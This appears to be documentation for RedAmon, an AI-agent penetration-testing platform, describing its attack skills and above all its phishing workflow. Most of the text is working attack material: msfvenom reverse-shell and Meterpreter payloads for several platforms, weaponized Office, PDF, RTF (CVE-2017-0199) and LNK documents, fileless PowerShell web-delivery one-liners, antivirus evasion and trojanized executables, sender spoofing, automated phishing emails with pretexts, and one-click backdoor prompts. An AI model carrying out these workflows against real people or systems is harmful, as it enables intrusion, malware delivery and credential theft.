Attack Skills

RedAmon uses attack skills to guide the AI agent through specific exploitation workflows. Each skill defines the tools, workflow steps, and phase-specific behavior the agent follows when executing an attack. Skills are divided into two categories: built-in skills (shipped with RedAmon) and user skills (custom .md files you upload).

Overview

The agent supports two types of attack skills:

Type	Skills	Description
Built-in	CVE (MSF), Brute Force, Phishing, DoS	Ship with RedAmon. The agent has built-in knowledge of these workflows — no `.md` file is needed.
User	Any custom skill you upload	Custom `.md` files that define reconnaissance, exploitation, and post-exploitation steps for any technique (SQL injection, XSS, SSRF, privilege escalation, etc.).

#	Skill	Badge	Classification Key	Type
1	CVE (MSF)	CVE/MSF (orange)	`cve_exploit`	Built-in
2	Hydra Brute Force	BRUTE (purple)	`brute_force_credential_guess`	Built-in
3	Phishing / Social Engineering	PHISH (pink)	`phishing_social_engineering`	Built-in
4	Denial of Service (DoS)	DoS (red)	`denial_of_service`	Built-in
5	User Skills	SKILL (blue)	`user_skill:<id>`	User
6	Unclassified Fallback	grey	`<term>-unclassified`	Automatic

Each skill provides workflow prompts that guide the agent step by step. The unclassified fallback is used when no skill matches — the agent uses all available tools generically.

User Attack Skills

User attack skills let you teach the agent custom attack workflows that go beyond the built-in CVE/brute-force/phishing paths. Each skill is a Markdown (.md) file that describes the complete attack workflow — from reconnaissance through exploitation to post-exploitation.

Key difference from built-in skills: The agent has no prior knowledge of your custom skill. The .md content is injected directly into the agent's prompt in all three phases (informational, exploitation, post-exploitation), so the agent sees your instructions throughout the entire session.

Each user skill has an optional description field — a short summary (1-2 sentences) that tells the Intent Router what the skill is about. This is used for classification instead of truncating the skill content, saving tokens and improving accuracy. You can add or edit descriptions from Global Settings.

Uploading a New Skill

User attack skills are uploaded from the Global Settings page (/settings), under the Attack Skills section.

Global Settings — Attack Skills Upload

Steps:

Navigate to Global Settings (gear icon in the top bar, far right)
Scroll to the Attack Skills section
Click Upload Skill (.md) and select your Markdown file
A modal appears — enter a descriptive name and an optional description (1-2 sentences summarizing what this skill does, used by the LLM to classify requests — e.g., "SQL injection testing against web app parameters using sqlmap")
Click Upload — the skill is saved and immediately available for all projects

You can delete skills from the same section. Deleting a skill automatically removes it from all project configurations.

Editing a Skill Description

Each skill in the Global Settings list has a pencil icon (edit) button. Click it to update the skill's description — this is the short summary the Intent Router uses to decide when to select this skill. Without a description, the first 500 characters of the markdown content are used as a fallback.

Writing a Skill File

A skill .md file should contain:

When to Classify Here — Keywords and scenarios that trigger this skill (helps the LLM classify correctly)
Phase 1: Reconnaissance (Informational) — What to discover before exploitation (injection surfaces, technology stack, parameters)
Phase 2: Exploitation — Step-by-step attack workflow with tool commands
Phase 3: Post-Exploitation (optional) — What to do after a successful exploit (data extraction, privilege escalation)
Reporting Guidelines — What to include in findings
Important Notes — Guardrails, flags, limits

Example — SQL Injection skill:

# SQL Injection Attack Skill

## When to Classify Here
Use this skill when the user requests testing for SQL injection vulnerabilities, including:
- Testing web application forms, URL parameters, or API endpoints for SQLi
- Exploiting known SQL injection points
- Extracting data from databases via injection

## Workflow

### Phase 1: Reconnaissance (Informational)
1. **Identify injection surfaces** — Use `query_graph` to find web applications,
   HTTP services, and known endpoints on the target.
2. **Discover parameters** — Use `kali_shell` to run directory/parameter discovery:

katana -u http:// -d 2 -jc -o urls.txt

3. **Check technology stack** — Identify the backend database from service banners
or known stack info in the graph.

Once surfaces are identified, **request transition to exploitation phase**.

### Phase 2: Exploitation
1. **Automated scan with sqlmap**:

sqlmap -u "http:///page?id=1" --batch --level=3 --risk=2 --random-agent

2. **Manual verification** — For confirmed injection points:

sqlmap -u "" -p --dbs --batch sqlmap -u "" -p -D --tables --batch


## Reporting Guidelines
- Endpoint and parameter, injection type, database type, impact demonstration

## Important Notes
- Always use `--batch` with sqlmap to avoid interactive prompts
- Do NOT dump entire databases — extract only enough to prove the vulnerability

The agent reads this file verbatim in its system prompt and follows the steps for each phase.

Example Skill Files

Download these ready-to-upload skill files as starting templates:

SQL Injection Skill — sqlmap-based workflow covering parameter discovery, automated scanning, database enumeration, and post-exploitation (OS shell, file read)
Cross-Site Scripting (XSS) Skill — reflected, stored, and DOM-based XSS testing with WAF bypass techniques and impact demonstration

Upload them directly in Global Settings > Attack Skills or use them as templates to write your own.

Enabling Skills per Project

Each project can independently enable or disable any combination of built-in and user skills. This is configured in the project's Attack Skills tab (Tab 13 in the project form).

Project Settings — Attack Skills Tab

Behavior:

All skills are enabled by default — newly uploaded user skills are automatically available in all projects
Toggle OFF to exclude a skill from classification for that project
If no user skills exist, a link to Global Settings is shown so you can upload one
Disabled skills are excluded from the classification candidates — the agent will never select them

How Classification Works

When you send a message to the agent, the Intent Router (an LLM classification step) runs once at the start of each new objective. It analyzes your request and determines:

Phase: Is this informational (reconnaissance) or exploitation (active attack)?
Attack skill: Which skill matches the request?

The classification considers all enabled skills for the current project — both built-in and user. To minimize token usage, the classification prompt uses lightweight summaries rather than full workflow details: built-in skills use short keyword-based descriptions, and user skills use the description field (or the first 500 characters of content as fallback):

User request
    │
    ├── Matches a user skill's description (or content preview)?
    │   └── user_skill:<id>  (e.g., SQL injection, XXE, JWT abuse)
    │
    ├── Mentions CVE ID, vulnerability, or exploit module?
    │   └── cve_exploit
    │
    ├── Mentions password, brute force, credentials, wordlist?
    │   └── brute_force_credential_guess
    │
    ├── Mentions phishing, payload, malicious document, msfvenom?
    │   └── phishing_social_engineering
    │
    ├── Matches a known technique but no skill?
    │   └── <term>-unclassified  (e.g., ssrf-unclassified)
    │
    └── Truly unclear?
        └── cve_exploit (default)

The classification determines which workflow prompts the agent sees. User skills inject their full .md content into the prompt. Built-in skills use the agent's built-in knowledge (the LLM already knows how to use Metasploit, Hydra, etc.).

Classification Badge

Once classified, the attack skill badge appears in the agent drawer's status bar next to the phase indicator. It shows throughout all phases (informational, exploitation, post-exploitation).

Hover the badge to see a tooltip with all available skills organized by group (Built-in / User Skills), with:

A checkmark on the currently classified skill
OFF label on disabled skills (greyed out)

Built-in Skills

Built-in skills ship with RedAmon and rely on the agent's inherent knowledge of the tools (Metasploit, Hydra, msfvenom, etc.). No .md file is injected — the agent already knows these workflows.

CVE (MSF)

Classification: cve_exploit Badge: CVE/MSF (orange) Tools: metasploit_console, kali_shell, execute_code

The agent searches for a matching Metasploit exploit module, configures target parameters and payload (reverse/bind shell), and fires the exploit. Supports both statefull (Meterpreter session) and stateless (one-shot command) post-exploitation.

12-Step Workflow:

search CVE-XXXX-XXXXX — find exploit module
use exploit/path/... — load module
info — get module description
show targets — list OS/app versions
show options — display configurable params
set TARGET <N> — select target type
show payloads — list compatible payloads
set CVE CVE-XXXX-XXXXX — set CVE variant
set PAYLOAD <payload> — choose payload
set RHOSTS/RPORT/SSL — configure connection
set LHOST/LPORT (or CMD) — mode-specific options
exploit — execute

No-Module Fallback: When no Metasploit module exists for a CVE, the agent falls back to manual exploitation using execute_code, kali_shell, execute_nuclei, and execute_curl with PoC scripts.

Hydra Brute Force

Classification: brute_force_credential_guess Badge: BRUTE (purple) Tool: execute_hydra

Uses THC Hydra to brute force credentials against 50+ authentication protocols. The agent automatically selects appropriate wordlists, configures protocol-specific parameters, and establishes access after credentials are discovered.

Supported protocols include: SSH, FTP, RDP, VNC, SMB, Telnet, MySQL, MSSQL, PostgreSQL, Oracle, MongoDB, Redis, POP3, IMAP, SMTP, HTTP Basic, HTTP POST form, Tomcat, WordPress, Jenkins, and many more.

Configuration: Threads, timeouts, extra checks, and retry strategies are configurable per project in the Attack Skills tab. See Project Settings Reference > Hydra Brute Force.

Phishing / Social Engineering

Classification: phishing_social_engineering Badge: PHISH (pink) Tools: kali_shell (msfvenom), metasploit_console (fileformat modules, handler, web_delivery), execute_code (email sending)

This attack path targets human factors rather than software vulnerabilities. Instead of exploiting a bug directly, the agent generates malicious payloads, weaponized documents, or delivery mechanisms that require a human to execute — opening a file, clicking a link, or running a command.

Key difference from CVE (MSF): CVE exploitation targets a software vulnerability directly — the agent fires the exploit and the service is compromised automatically. Phishing targets a person — the agent generates a weaponized artifact and delivers it, but a human must execute it for the attack to succeed. This is a human-in-the-loop attack path.

How It Works: The 6-Step Workflow

The agent follows a mandatory 6-step workflow:

┌─────────────────────────────────────────────────────────────────────────┐
│              PHISHING / SOCIAL ENGINEERING WORKFLOW                       │
├─────────────────────────────────────────────────────────────────────────┤
│                                                                          │
│  Step 1: DETERMINE TARGET PLATFORM & DELIVERY METHOD                    │
│    ├── Target OS: Windows / Linux / macOS / Android / Multi-platform    │
│    └── Method: A) Standalone Payload  B) Malicious Document             │
│                C) Web Delivery        D) HTA Delivery                   │
│                                                                          │
│  Step 2: SET UP HANDLER (always — runs in background)                   │
│    └── exploit/multi/handler + matching payload + LHOST/LPORT + run -j  │
│                                                                          │
│  Step 3: GENERATE PAYLOAD / DOCUMENT (choose one method)                │
│    ├── A: msfvenom → exe/elf/apk/ps1/vba/hta-psh/war/macho/raw        │
│    ├── B: Metasploit fileformat → Word/Excel/PDF/RTF/LNK               │
│    ├── C: web_delivery → Python/PHP/PSH/Regsvr32/pubprn one-liner      │
│    └── D: hta_server → URL the target opens in browser                  │
│                                                                          │
│  Step 4: VERIFY PAYLOAD WAS GENERATED                                   │
│    └── ls -la, file command, jobs check                                  │
│                                                                          │
│  Step 5: DELIVER TO TARGET                                               │
│    ├── Chat download: report path + docker cp command                   │
│    ├── Email: execute_code with Python smtplib (SMTP config from        │
│    │          project settings or asked at runtime)                      │
│    └── Web link: report one-liner (Method C) or URL (Method D)          │
│                                                                          │
│  Step 6: WAIT FOR CALLBACK & VERIFY SESSION                             │
│    └── sessions -l → if session opens → post_exploitation               │
│                                                                          │
└─────────────────────────────────────────────────────────────────────────┘

Step 1 — If the user's request doesn't specify the target platform or delivery method, the agent asks via action="ask_user". If the request is specific (e.g., "create a malicious Word document"), the agent skips asking and proceeds directly.

Step 2 — The handler is always set up first (or in parallel with payload generation). It runs as a background job (run -j) so it waits while the payload is generated and delivered.

Step 3 — The agent chooses the generation method based on the user's request and target platform. Each method is detailed below.

Step 4 — The agent verifies the artifact was created before attempting delivery. For msfvenom payloads, it checks the file exists and its type. For web delivery and HTA, it confirms the background job is running.

Step 5 — Delivery depends on the method and user preference. Chat download is the default (the agent provides a docker cp command). Email delivery and web links are used when requested.

Step 6 — After delivery, the agent monitors for a callback. When a Meterpreter session opens, it requests transition to post_exploitation phase.

Method A: Standalone Payload (msfvenom)

Generate a binary, script, or APK that the target executes directly. Uses msfvenom via the kali_shell tool.

Command syntax:

msfvenom -p <payload> LHOST=<attacker_ip> LPORT=<port> -f <format> -o /tmp/<filename>

Payload + Format Matrix

Windows Payloads:

Payload	Format	Output	Use Case
`windows/meterpreter/reverse_tcp`	`exe`	`payload.exe`	Most common — standard Windows executable
`windows/meterpreter/reverse_https`	`exe`	`payload.exe`	Encrypted traffic — bypasses firewalls and DPI
`windows/shell_reverse_tcp`	`exe`	`shell.exe`	Fallback when meterpreter is detected by AV
`windows/meterpreter/reverse_tcp`	`psh`	`payload.ps1`	PowerShell script — no EXE on disk
`windows/meterpreter/reverse_tcp`	`psh-reflection`	`payload.ps1`	Reflective PowerShell — better AV evasion
`windows/meterpreter/reverse_tcp`	`vba`	`payload.vba`	VBA macro code — paste into Office document
`windows/meterpreter/reverse_tcp`	`hta-psh`	`payload.hta`	HTA file with embedded PowerShell
`windows/meterpreter/reverse_tcp`	`vbs`	`payload.vbs`	VBScript — runs via `wscript.exe`
`windows/meterpreter/reverse_tcp`	`asp`	`payload.asp`	Classic ASP web shell — deploy to IIS

Linux Payloads:

Payload	Format	Output	Use Case
`linux/x64/meterpreter/reverse_tcp`	`elf`	`payload.elf`	Standard Linux ELF binary
`linux/x64/shell_reverse_tcp`	`elf`	`shell.elf`	Shell fallback if meterpreter fails
`cmd/unix/reverse_bash`	`raw`	`payload.sh`	Bash one-liner — no binary needed
`cmd/unix/reverse_python`	`raw`	`payload.py`	Python one-liner — cross-platform
`cmd/unix/reverse_netcat`	`raw`	`payload.sh`	Netcat-based reverse shell

macOS Payloads:

Payload	Format	Output	Use Case
`osx/x64/meterpreter/reverse_tcp`	`macho`	`payload.macho`	macOS Mach-O binary
`osx/x64/shell_reverse_tcp`	`macho`	`shell.macho`	Shell fallback for macOS

Mobile Payloads:

Payload	Format	Output	Use Case
`android/meterpreter/reverse_tcp`	`raw`	`payload.apk`	Android APK — install on target device

Web / Multi-platform Payloads:

Payload	Format	Output	Use Case
`java/meterpreter/reverse_tcp`	`war`	`payload.war`	Java WAR — deploy to Tomcat/JBoss/WebLogic
`java/meterpreter/reverse_tcp`	`jar`	`payload.jar`	Java JAR — cross-platform Java targets
`python/meterpreter/reverse_tcp`	`raw`	`payload.py`	Python — works anywhere Python is installed
`php/meterpreter/reverse_tcp`	`raw`	`payload.php`	PHP — deploy to web server
`cmd/unix/reverse_ruby`	`raw`	`payload.rb`	Ruby — for systems with Ruby installed

Example — Windows EXE:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o /tmp/payload.exe

Example — Linux ELF:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o /tmp/payload.elf

Example — Android APK:

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 R > /tmp/payload.apk

Useful msfvenom flags:

Flag	Purpose	Example
`-p`	Payload to use	`-p windows/meterpreter/reverse_tcp`
`LHOST=`	Callback IP address	`LHOST=10.0.0.1`
`LPORT=`	Callback port	`LPORT=4444`
`-f`	Output format	`-f exe`, `-f elf`, `-f raw`
`-o`	Output file path	`-o /tmp/payload.exe`
`-e`	Encoder for AV evasion	`-e x86/shikata_ga_nai`
`-i`	Encoding iterations	`-i 5`
`-a`	Architecture	`-a x86`, `-a x64`
`--platform`	Target platform	`--platform windows`
`-x`	Inject into existing executable	`-x /tmp/putty.exe`
`-k`	Keep template functionality (with -x)	`-k`
`-b`	Bad characters to avoid	`-b '\x00\x0a'`
`--list payloads`	List all available payloads	`msfvenom --list payloads \| grep windows`
`--list formats`	List output formats	`msfvenom --list formats`
`--list encoders`	List available encoders	`msfvenom --list encoders`

Method B: Malicious Document (Metasploit Fileformat)

Generate weaponized Office, PDF, RTF, or LNK files using Metasploit fileformat modules. The target opens the document, which executes the embedded payload (via macro, exploit, or link).

B1: Word Document with VBA Macro (.docm)

Creates a Word document with an embedded VBA macro. When the target opens the document and enables macros (the "Enable Content" prompt), the macro executes and opens a Meterpreter session.

use exploit/multi/fileformat/office_word_macro
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 4444
set FILENAME report_q1_2026.docm
run

How the victim triggers it: They receive the document via email or download. When opened in Microsoft Word, a yellow bar appears: "SECURITY WARNING: Macros have been disabled." If the victim clicks "Enable Content", the macro runs and the callback fires.

B2: Excel Document with VBA Macro (.xlsm)

Same concept as Word but in an Excel spreadsheet. Common in corporate phishing — disguised as financial reports, invoices, or data exports.

use exploit/multi/fileformat/office_excel_macro
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 4444
set FILENAME invoice_march_2026.xlsm
run

B3: PDF with Embedded Executable (Adobe Reader)

Creates a PDF that contains an embedded executable payload. When opened in vulnerable versions of Adobe Reader, the payload auto-executes.

use exploit/windows/fileformat/adobe_pdf_embedded_exe
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 4444
set FILENAME security_audit_results.pdf
run

Note: This targets older Adobe Reader versions. Modern readers will show a security warning. Most effective against targets with outdated PDF software.

B4: RTF with HTA Handler (CVE-2017-0199)

Creates an RTF document that, when opened, automatically fetches and executes an HTA payload from the attacker's server. The module self-hosts the HTA payload — no additional setup needed.

use exploit/windows/fileformat/office_word_hta
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 4444
set SRVHOST 0.0.0.0
set SRVPORT 8080
set FILENAME urgent_memo.rtf
run

How it works: The RTF contains an OLE object that triggers an HTTP request to the attacker's HTA server when the document is opened. The server responds with an HTA application that executes the payload. This is particularly dangerous because it requires no macro approval — it exploits CVE-2017-0199 in Microsoft Office.

B5: LNK Shortcut File

Creates a malicious Windows shortcut (.lnk) that executes a payload when the target double-clicks it. LNK files can be disguised with any icon (folder, document, etc.).

use exploit/windows/fileformat/lnk_shortcut_ftype_append
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 4444
set FILENAME Important_Documents.lnk
run

Delivery trick: Place the LNK file on a USB drive or shared folder. Disguise it with a folder icon so the target thinks they're opening a directory.

Important: Fileformat Module Output Location

All Metasploit fileformat modules save output to:

/root/.msf4/local/<FILENAME>

The agent always copies the file to /tmp/ after generation for easier access:

cp /root/.msf4/local/report_q1_2026.docm /tmp/

Method C: Web Delivery (Fileless)

Host a payload on the attacker's web server and generate a one-liner command that the target pastes into a terminal or command prompt. The payload executes entirely in memory — no file ever touches disk. This is the most stealthy delivery method.

use exploit/multi/script/web_delivery
set TARGET <number>
set PAYLOAD <payload>
set LHOST 10.0.0.1
set LPORT 4444
set SRVHOST 0.0.0.0
set SRVPORT 8080
run -j

Target Selection

TARGET #	Language	Runs On	Payload Example	Best For
0	Python	Linux, macOS, Windows (with Python)	`python/meterpreter/reverse_tcp`	Cross-platform targets with Python installed
1	PHP	Web servers with PHP	`php/meterpreter/reverse_tcp`	Compromised web servers, shared hosting
2	PSH (PowerShell)	Windows 7+	`windows/meterpreter/reverse_tcp`	Standard Windows targets (most common)
3	Regsvr32	Windows	`windows/meterpreter/reverse_tcp`	Bypass AppLocker and software restriction policies
4	pubprn	Windows	`windows/meterpreter/reverse_tcp`	Script execution policy bypass via pubprn.vbs
5	SyncAppvPublishingServer	Windows 10+	`windows/meterpreter/reverse_tcp`	App-V service bypass
6	PSH (Binary)	Windows	`windows/meterpreter/reverse_tcp`	PowerShell binary delivery (larger but more reliable)

How it works:

The module starts a web server on SRVHOST:SRVPORT inside the Kali container
It generates a one-liner command and prints it in the console output
When the target executes the one-liner, it downloads and runs the payload in memory
The handler catches the callback and opens a session

Example one-liner output (PowerShell, TARGET 2):

powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcg...

Delivery scenarios:

Social-engineer the target into opening a command prompt and pasting the command
Inject the one-liner into a script the target will run
Embed it in a malicious document's macro that shells out to PowerShell
Have the target run it through a fake "IT support" scenario

Method D: HTA Delivery Server

Host an HTA (HTML Application) that executes a payload when the target opens it in their browser. HTA files have full access to Windows system APIs — they run with the same privileges as a native application.

use exploit/windows/misc/hta_server
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 4444
set SRVHOST 0.0.0.0
set SRVPORT 8080
run -j

Output: The module prints a URL like:

http://10.0.0.1:8080/AbCdEf.hta

How the victim triggers it:

Receives the URL in a phishing email or chat message
Opens the URL in Internet Explorer or Edge (legacy mode)
Windows prompts "Do you want to run or save this file?" — if they click Run, the HTA executes
The HTA runs PowerShell or other commands that download and execute the payload

When to use HTA vs. Web Delivery:

HTA: Target will visit a URL in a browser. Requires Windows + IE/Edge.
Web Delivery: Target will paste a command into a terminal. Works on any OS.

The Handler

Every phishing attack requires a handler — the listener that catches the callback when the target executes the payload. The handler is set up via exploit/multi/handler in the Metasploit console.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 4444
run -j

Critical rules:

The handler MUST match the payload exactly — same payload type, same LHOST, same LPORT. A mismatch causes the callback to silently fail with no error message.
Run with -j (background job) — the handler waits indefinitely for a connection while you prepare and deliver the payload.
Set up the handler FIRST (or in parallel with payload generation) — if the target executes the payload before the handler is running, the callback is lost.
LHOST/LPORT come from the project's "Payload Direction" settings (configured in the Agent Behaviour tab). If a tunnel provider (ngrok or chisel) is enabled, the public endpoint is used automatically.

For BIND mode (rare in phishing — the target machine must be directly reachable):

use exploit/multi/handler
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST <target_ip>
set LPORT 4444
run -j

Delivery Methods

After generating the payload, the agent delivers it through one of three channels.

Chat Download (Default)

The agent reports the file location, file size, payload type, and handler status. It provides a docker cp command for you to download the file:

docker cp redamon-kali:/tmp/payload.exe ./payload.exe

You then deliver the file to the target manually through any channel — email (from your own client), chat, USB drive, shared network drive, or any other method.

This is the default delivery — the agent always provides this option regardless of other settings.

Email Delivery (On Request)

When you ask the agent to send the payload via email, it uses execute_code with Python smtplib to compose and send the email. The agent writes a Python script inside the Kali container that:

Connects to an external SMTP server (Gmail, Outlook, etc.)
Composes an email with a convincing subject and body
Attaches the payload file (for Methods A & B) or embeds a link (for Methods C & D)
Sends the email to the specified target address

The agent crafts the email content based on the attack scenario — it generates appropriate pretexts (IT support, invoice, report, security alert, etc.).

Web Delivery Link (Methods C & D)

For web delivery and HTA attacks, there's no file to transfer. The agent reports:

Method C: The one-liner command printed by web_delivery
Method D: The URL printed by hta_server

You deliver these through any channel — email body, chat message, embedded in a document, etc.

SMTP Configuration for Email Delivery

SMTP settings for email delivery are configured in the project's Attack Skills tab (Tab 13) as a free-text textarea.

Example configuration:

SMTP_HOST: smtp.gmail.com
SMTP_PORT: 587
SMTP_USER: pentest@gmail.com
SMTP_PASS: abcd efgh ijkl mnop
SMTP_FROM: it-support@company.com
USE_TLS: true

Supported SMTP providers:

Provider	Host	Port	Auth	Notes
Gmail	`smtp.gmail.com`	587 (TLS)	App Password	Requires 2FA enabled + App Password (not your login password)
Outlook/Office 365	`smtp.office365.com`	587 (TLS)	Password	May require admin to enable SMTP AUTH
Yahoo	`smtp.mail.yahoo.com`	587 (TLS)	App Password	Similar to Gmail — generate an App Password
SendGrid	`smtp.sendgrid.net`	587 (TLS)	API Key	Free tier: 100 emails/day
Mailgun	`smtp.mailgun.org`	587 (TLS)	API credentials	Free tier: sandbox domain
Amazon SES	`email-smtp.<region>.amazonaws.com`	587 (TLS)	IAM credentials	Must verify sender address/domain
Custom/Self-hosted	Your server	25/465/587	Varies	Must have proper SPF/DKIM/DMARC

If no SMTP settings are configured, the agent asks you at runtime for the SMTP host, port, username, password, sender address, and target email address. It never attempts to send email without credentials.

Why is SMTP required? Email cannot be sent "directly" from the Kali container. Modern mail servers (Gmail, Outlook, corporate servers) reject emails from IP addresses without proper SPF, DKIM, and DMARC DNS records. Direct SMTP connections from unknown IPs are flagged as spam or rejected outright. The agent relays through a legitimate SMTP service to ensure delivery.

SMTP_FROM vs SMTP_USER: SMTP_USER is the account you authenticate with. SMTP_FROM is the "From" address shown to the recipient. Some SMTP providers allow these to differ (useful for spoofing a sender address), while others require them to match.

AV Evasion Techniques

The agent can apply encoding and obfuscation to generated payloads to bypass antivirus detection.

Shikata Ga Nai Encoding

The most common encoder in msfvenom. Applies polymorphic XOR encoding that produces a different output each time:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 \
  -e x86/shikata_ga_nai -i 5 -f exe -o /tmp/payload_encoded.exe

Flag	Purpose
`-e x86/shikata_ga_nai`	Use the shikata_ga_nai encoder
`-i 5`	Apply 5 encoding iterations (more = harder to detect, larger file)

Template Injection (Trojanizing)

Inject the payload into an existing legitimate executable. The target sees a normal application that also runs the payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 \
  -x /tmp/putty.exe -k -f exe -o /tmp/putty_trojan.exe

Flag	Purpose
`-x /tmp/putty.exe`	Template executable to inject into
`-k`	Keep the template's original functionality (putty still works)

Multiple Encoders

Chain multiple encoders for deeper obfuscation:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 \
  -e x86/shikata_ga_nai -i 3 -f raw | \
  msfvenom -e x86/countdown -i 2 -f exe -o /tmp/payload_multi.exe

Bad Character Avoidance

When targeting services that filter certain bytes (null bytes, newlines, etc.):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 \
  -b '\x00\x0a\x0d' -f exe -o /tmp/payload_clean.exe

Available encoders (list with msfvenom --list encoders):

Encoder	Arch	Rank	Use Case
`x86/shikata_ga_nai`	x86	Excellent	General AV evasion, polymorphic
`x86/countdown`	x86	Normal	Additional layer with shikata
`x64/xor`	x64	Normal	64-bit payload encoding
`x86/bloxor`	x86	Manual	Block-based XOR encoding
`cmd/powershell_base64`	cmd	Excellent	PowerShell base64 encoding
`php/base64`	php	Great	PHP payload encoding

Post-Exploitation After Phishing

When the target executes the payload and the handler catches the callback, a Meterpreter session opens. The agent then requests a phase transition to post_exploitation — this is identical to post-exploitation after a CVE exploit:

Statefull mode: Interactive Meterpreter commands — sysinfo, getuid, hashdump, upload, download, portfwd, shell, migrate, privilege escalation, lateral movement
Stateless mode: Re-generate and deliver payloads with different commands

The phase transition requires user approval (if approval gates are enabled).

If no session opens after delivery, the agent follows a retry strategy:

Verify the handler is still running: jobs in metasploit_console
Verify payload/handler match: same payload type, LHOST, LPORT
Try a different payload format (e.g., switch from exe to psh-reflection)
Ask the user via action="ask_user" if the target has executed the payload
After 3 failed attempts: Stop and ask the user for guidance — do not keep trying the same approach

Troubleshooting

Problem	Cause	Solution
msfvenom "Invalid payload"	Wrong payload name	List available: `msfvenom --list payloads \| grep <term>`
Fileformat module "exploit completed but no session"	Expected — fileformat modules generate files, not sessions	The session comes when the target opens the file
Handler dies immediately	LHOST is wrong or port is in use	Use `0.0.0.0` for LHOST; check port: `netstat -tlnp \| grep 4444`
Target executes but no callback	Firewall blocks outbound connection	Try `reverse_https` (port 443) or `bind_tcp` instead
"Payload is too large"	Format or encoder produces too-large output	Use staged payload or different format
Web delivery one-liner blocked	AppLocker or execution policy	Try Regsvr32 (TARGET 3) for AppLocker bypass
Email not delivered	SMTP auth failed or spam filtered	Check App Password, try a different SMTP provider
Email sent but payload blocked	Email gateway strips attachments	Use web delivery link instead of file attachment
Android APK won't install	"Install from unknown sources" disabled	Target must enable it in Settings > Security
HTA URL shows download prompt	Edge/Chrome instead of IE	HTA only auto-runs in Internet Explorer

Example Scenarios

Scenario 1: Windows EXE Payload via Chat Download

You: "Generate a Windows reverse shell payload"

The agent:

Sets up handler: exploit/multi/handler with windows/meterpreter/reverse_tcp
Generates: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o /tmp/payload.exe
Verifies: ls -la /tmp/payload.exe && file /tmp/payload.exe
Reports path + docker cp redamon-kali:/tmp/payload.exe ./payload.exe

Scenario 2: Malicious Excel Macro via Email

You: "Create a malicious Excel spreadsheet with a macro and send it via email to target@example.com"

The agent:

Sets up handler with windows/meterpreter/reverse_tcp
Generates: exploit/multi/fileformat/office_excel_macro → invoice_march.xlsm
Copies from /root/.msf4/local/invoice_march.xlsm to /tmp/
Reads SMTP config from project settings
Writes Python script with smtplib to send the file as an attachment with a convincing pretext
Sends the email and reports delivery status

Scenario 3: PowerShell Web Delivery

You: "Set up a PowerShell web delivery attack"

The agent:

Sets up handler with windows/meterpreter/reverse_tcp
Runs: exploit/multi/script/web_delivery with TARGET 2 (PSH)
Reports the one-liner command printed by the module
No file transfer needed — you deliver the one-liner through any channel

Scenario 4: Android APK Backdoor

You: "Generate an Android APK backdoor"

The agent:

Sets up handler with android/meterpreter/reverse_tcp
Generates: msfvenom -p android/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> R > /tmp/update.apk
Verifies the APK was created
Reports path + download command

Scenario 5: RTF Exploit (No Macro Approval Needed)

You: "Create an RTF document that doesn't require the target to enable macros"

The agent:

Uses Method B4: exploit/windows/fileformat/office_word_hta (CVE-2017-0199)
This exploit fires automatically when the RTF is opened — no "Enable Content" prompt
The module self-hosts the HTA payload on SRVHOST:SRVPORT
Reports the file + notes that the HTA server must stay running until the target opens the document

Scenario 6: AV Evasion with Encoded Payload

You: "Generate a phishing payload for Windows with AV evasion"

The agent:

Sets up handler
Generates with encoding: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -e x86/shikata_ga_nai -i 5 -f exe -o /tmp/payload_encoded.exe
Optionally tries template injection if the user provides a template executable
Verifies and reports

Quick-Start Suggestions Catalogue

When you open the AI Agent drawer and expand the Social Engineering template group, you see 8 collapsible sub-groups containing 118 pre-built attack suggestions. Each suggestion is a one-click prompt that tells the agent exactly what to generate and explains how the victim triggers the payload.

Every suggestion follows the format: "[Task] — victim triggers by [action]".

Below is the complete catalogue. Each entry includes the suggestion name, what the agent does, how the victim triggers it, and the exact prompt you can type (or click) in the AI Agent drawer.

1. Standalone Payloads

Binary or script payloads generated with msfvenom that the victim executes directly. The agent generates the file, sets up the matching exploit/multi/handler, and reports the file path or download command.

Windows

1. Meterpreter EXE (reverse_tcp)

What the agent does: msfvenom -p windows/meterpreter/reverse_tcp -f exe + handler
Victim triggers: Double-clicks the .exe file
Prompt: Generate a Windows Meterpreter EXE payload and set up the handler — victim triggers the session by double-clicking the .exe file

2. Meterpreter EXE (reverse_https)

What the agent does: msfvenom -p windows/meterpreter/reverse_https -f exe + handler
Victim triggers: Runs the .exe — traffic is encrypted HTTPS, bypasses firewall inspection
Prompt: Generate a Windows reverse_https Meterpreter EXE payload for encrypted callback and set up the handler — victim triggers by running the .exe file

3. DLL reverse shell (rundll32)

What the agent does: msfvenom -p windows/meterpreter/reverse_tcp -f dll + handler
Victim triggers: Runs rundll32 payload.dll,0 in cmd
Prompt: Generate a Windows Meterpreter DLL payload (msfvenom -f dll) and set up the handler — victim triggers by running: rundll32 payload.dll,0

4. MSI installer backdoor

What the agent does: msfvenom -p windows/meterpreter/reverse_tcp -f msi + handler
Victim triggers: Double-clicks the .msi — looks like a legitimate software installer
